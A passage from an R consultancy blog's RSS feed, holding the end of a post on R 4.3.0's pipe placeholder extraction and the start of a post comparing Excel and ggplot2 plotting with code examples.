&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Error &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has length &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="and-finally-extracting-from-a-pipe"&gt;And finally: Extracting from a pipe&lt;/h3&gt;
&lt;p&gt;Have you started using the native pipe yet? In our blog post to
celebrate the release of R 4.2.0, we showed this example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## lm(formula = mpg ~ disp, data = mtcars)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985 -0.04122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the pipe &lt;code&gt;|&amp;gt;&lt;/code&gt; passes the value on its left-hand side into the
function on the right. By default that value will be used as the first
argument to the right-hand function. But when an underscore is present,
the piped-in value will replace that underscore. So the above is
equivalent to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mtcars)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## lm(formula = mpg ~ disp, data = mtcars)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985 -0.04122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What if you want to extract values that are output by a pipeline? For
example, if you want the &lt;code&gt;coef&lt;/code&gt; entry from the linear model above. One
way would be to store the results in a variable and extract the &lt;code&gt;coef&lt;/code&gt;
from that:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;coef
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985476 -0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or you could wrap the pipeline in parentheses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;coef
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985476 -0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.3.0 provides a neater solution: the underscore placeholder &lt;code&gt;_&lt;/code&gt; can now be
used at the head of an extraction call, such as &lt;code&gt;_$coef&lt;/code&gt;, to pull an
element out of the final value of a pipeline:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; _&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;coef
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985476 -0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="trying-the-latest-version-out-for-yourself"&gt;Trying the latest version out for yourself&lt;/h3&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use Docker. To run the &lt;code&gt;devel&lt;/code&gt; version of R, use the
following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;See the &lt;code&gt;r-docker&lt;/code&gt; project for &lt;a href="https://github.com/rstudio/r-docker" rel="external"&gt;more
details&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;Do you have nostalgia for previous versions of R? If so, check out our
previous blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r43/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: The Excel R plotting comparison: Part 2</title><link>https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/</link><pubDate>Thu, 13 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-R-Excel-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 2 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: The Excel R Data Wrangling comparison:
Part
1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Why should I use R: The Excel R plotting comparison: Part 2
(This post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: Handling Dates in R and Excel: Part
3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Why create plots in R and not Excel? To a programmer the answer may seem
obvious, but it is still a common question from
Excel users: if you have a data set, why not just select it, hit a couple
of buttons and generate plots? This is one of the trickiest questions to
answer, especially if you have limited Excel experience, as many newer
data scientists do. Hopefully, some of the reasons below will encourage
you to make the switch from Excel to R.&lt;/p&gt;
&lt;h3 id="reproducibility"&gt;Reproducibility&lt;/h3&gt;
&lt;p&gt;How do you view the code used to generate the Excel graph? Are you able
to tell exactly what’s going on? Are you able to control and modify all
of the aesthetics of the plot, such as changing the length of the axis
ticks, or changing the font? If yes, are you able to share your work
with a colleague and have them easily replicate your plot without you
telling them where to click and which modification should be applied?&lt;/p&gt;
&lt;p&gt;With R all of these things are possible. You automatically have all the
code visible in the form of scripts. Reading and understanding the code
is possible because of its easy-to-read syntax, which allows you to
track what the code is doing without having to be concerned about any
hidden functions or modifications happening in the background.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-why-create-plots-in-R-Excel-part-2"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="understanding-changes"&gt;Understanding changes&lt;/h3&gt;
&lt;p&gt;In Excel it is challenging to eyeball which changes have been made to a
graph, especially if these were minor changes. With R (and an easy-to-use
version control system), you can see exactly which files and lines were
changed. Also, in Excel, a user would usually draw a graph on a single
Excel document, and if the same graph is required on a different data
set, it is common to copy-and-paste a bunch of manipulations and
configurations to another document. Such repeated human interaction is
prone to introducing errors, as well as consuming a large amount of
time. With R we can avoid this by creating functions, which can be used
to run the same code on different data sets simply by changing the
input, thereby producing reliable outputs and saving us a lot of time.&lt;/p&gt;
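&lt;p&gt;As a minimal sketch of this idea, the hypothetical helper below wraps a
scatter plot in a function, so that the same code can be run on different
data sets. The name &lt;code&gt;scatter_by_group()&lt;/code&gt; and its arguments are our own
invention for illustration, not part of any package, and the built-in
&lt;code&gt;iris&lt;/code&gt; and &lt;code&gt;mpg&lt;/code&gt; data sets stand in for your own data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Hypothetical helper: draws the same style of scatter plot for any data frame.
# x, y and group are column names supplied as strings.
scatter_by_group &amp;lt;- function(data, x, y, group) {
  ggplot(data, aes(x = .data[[x]], y = .data[[y]])) +
    geom_point(aes(colour = .data[[group]])) +
    labs(x = x, y = y, colour = group) +
    theme_bw()
}

# Same code, two different data sets: only the inputs change
scatter_by_group(iris, &amp;#34;Sepal.Length&amp;#34;, &amp;#34;Sepal.Width&amp;#34;, &amp;#34;Species&amp;#34;)
scatter_by_group(mpg, &amp;#34;displ&amp;#34;, &amp;#34;hwy&amp;#34;, &amp;#34;class&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Any change to the styling now only has to be made once, inside the
function, rather than in every copy of the graph.&lt;/p&gt;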
&lt;h3 id="extensibility"&gt;Extensibility&lt;/h3&gt;
&lt;p&gt;Yes, Excel has a wide range of basic graphics available, but R has a lot
more. Excel has been around for a while, so it has some decent tools
that have been developed over the years. R, however, is open source, and
therefore extensions are widely available; it’s even fairly easy to
make your own. R also has thousands of packages, many of which can be used to
produce sophisticated graphics without a lot of preparatory
work. With that being said, Excel is perfectly sufficient
when creating basic, simple, straightforward plots. But what if we’re
not looking to be basic?&lt;/p&gt;
&lt;h3 id="the-simplicity-of-r"&gt;The simplicity of R&lt;/h3&gt;
&lt;p&gt;The package &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt; is a plotting
package in R that provides us with commands to create complex plots. R’s
command line interface lets you quickly select x- and y-axis labels,
colour by variables, modify grid lines and much more. Each item is added
in a new layer, which allows us to add in and remove graph elements
without affecting the rest of the plot. Interested in changing the
colour gradient/scale of your plot? No problem, just use a package
called
&lt;a href="https://earlglynn.github.io/RNotes/package/RColorBrewer/index.html" rel="external"&gt;{RColorBrewer}&lt;/a&gt;,
which helps you select sensible colour schemes for your plots.
Interested in changing the title of your plot? Simply add a layer with
&lt;code&gt;ggtitle()&lt;/code&gt;. And there is so much more.&lt;/p&gt;
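&lt;p&gt;The layering described above can be sketched as follows. This is an
illustrative example rather than the code behind any plot in this post: it
uses the built-in &lt;code&gt;iris&lt;/code&gt; data, and the &lt;code&gt;&amp;#34;Dark2&amp;#34;&lt;/code&gt; palette and the title
text are arbitrary choices. The {ggplot2} function &lt;code&gt;scale_colour_brewer()&lt;/code&gt;
applies a ColorBrewer palette, and &lt;code&gt;ggtitle()&lt;/code&gt; adds the title:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Built-in iris data used as a stand-in for your own data
p &amp;lt;- ggplot(iris, aes(x = Sepal.Length, y = Sepal.Width)) +
  geom_point(aes(colour = Species)) +        # points, coloured by a variable
  scale_colour_brewer(palette = &amp;#34;Dark2&amp;#34;) +   # swap in a ColorBrewer palette
  ggtitle(&amp;#34;Sepal dimensions by species&amp;#34;)     # add a title as another layer
p
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Removing any one of these layers leaves the rest of the plot untouched.&lt;/p&gt;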
&lt;h3 id="the-comparison"&gt;The comparison&lt;/h3&gt;
&lt;p&gt;Let’s create some simple plots in Excel and then create a similar plot
in R using the {ggplot2} functions. Hopefully, by the end of this post,
we’ll have motivated you to switch to R. Now, let’s get started by
loading the data and packages. The data set used below covers a
selection of movies and has five columns:
country, year, highest profit gained per movie, number of movies
produced and number of employees on set during production.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For plotting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;viridis&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Provides a range of colour palettes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For loading data &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# For data wrangling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;blog_data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s start by creating a scatter plot, in which we compare the number
of employees present in the different countries within each year.&lt;/p&gt;
&lt;h3 id="scatter-plot"&gt;Scatter Plot&lt;/h3&gt;
&lt;h4 id="excel"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The scatter plot generated in Excel was simple to create, but everything
had to be done manually: selecting the data and the variables for the x-
and y-axis and then selecting the type of plot. I was also required to
manually change the axis titles. If we were interested in changing the
grid lines, this would have to be done manually too. Looking at this
plot, is this something that you are able to easily recreate? Would you
know where to point and click to generate this visualisation?&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/scatter_plot.png" alt="Scatter plot generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;Here we created a similar plot in R using the {ggplot2} functions.
Because the code is visible we can easily recreate the plot above, but
also, we are able to conveniently see which functions and aesthetics
were applied to our plot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; no_employees)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of employees&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-scatter.png" alt="Scatter plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h3 id="theming-system-in-ggplot2"&gt;Theming system in {ggplot2}&lt;/h3&gt;
&lt;p&gt;Theme arguments specify the non-data features that you can control. For
example, the &lt;code&gt;axis.text&lt;/code&gt; argument controls the appearance of the axis
text, such as its font size, colour and face. The &lt;code&gt;axis.ticks.x&lt;/code&gt; argument
controls the ticks on the x-axis, and so on. The &lt;code&gt;theme()&lt;/code&gt; function
allows you to override the default theme elements, like
&lt;code&gt;theme(plot.title = element_text(colour = &amp;quot;red&amp;quot;))&lt;/code&gt;. &lt;a href="https://ggplot2.tidyverse.org/reference/ggtheme.html" rel="external"&gt;Complete
themes&lt;/a&gt;, like
&lt;code&gt;theme_bw()&lt;/code&gt;, set all of the theme elements to values designed to work
together.&lt;/p&gt;
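&lt;p&gt;A short sketch of how these pieces combine, using the built-in
&lt;code&gt;mtcars&lt;/code&gt; data rather than the movies data; the particular element values
are arbitrary choices for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

p &amp;lt;- ggplot(mtcars, aes(x = disp, y = mpg)) +
  geom_point() +
  ggtitle(&amp;#34;Fuel economy against engine displacement&amp;#34;) +
  theme_bw() +                                           # complete theme first
  theme(
    plot.title = element_text(colour = &amp;#34;red&amp;#34;),           # override the title colour
    axis.text = element_text(size = 10, face = &amp;#34;bold&amp;#34;),  # axis text appearance
    axis.ticks.x = element_blank()                       # remove the x-axis ticks
  )
p
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The order matters here: a complete theme such as &lt;code&gt;theme_bw()&lt;/code&gt; resets
every element, so individual &lt;code&gt;theme()&lt;/code&gt; overrides should be added after it.&lt;/p&gt;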
&lt;p&gt;We can take this plot even further. Let’s say we were interested in
creating the same plot as above, but with each country having its own
plotting panel within the same visualisation. We can use the &lt;code&gt;facet_wrap()&lt;/code&gt;
function from the {ggplot2} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; no_employees)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;Country, ncol &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of employees&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
